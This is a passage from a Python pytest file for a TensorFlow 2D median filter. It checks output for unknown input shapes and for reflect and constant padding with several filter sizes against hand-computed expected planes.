tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_median(shape):
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_median(image_shape):
expected_plane = tf.constant([[4, 4, 5], [5, 5, 5], [5, 6, 6]])
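# Same REFLECT-padded corner window [5, 4, 5, 2, 1, 2, 5, 4, 5] sorted is
# [1, 2, 2, 4, 4, 5, 5, 5, 5], so the median at (0, 0) is 4.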
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_median(image_shape):
expected_plane = tf.constant([[5, 5, 5], [5, 5, 5], [5, 5, 5]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter(image_shape):
expected_plane = tf.constant([[0, 2, 0], [2, 5, 3], [0, 5, 0]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant([[1, 2, 1], [2, 5, 3], [1, 5, 1]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.ma |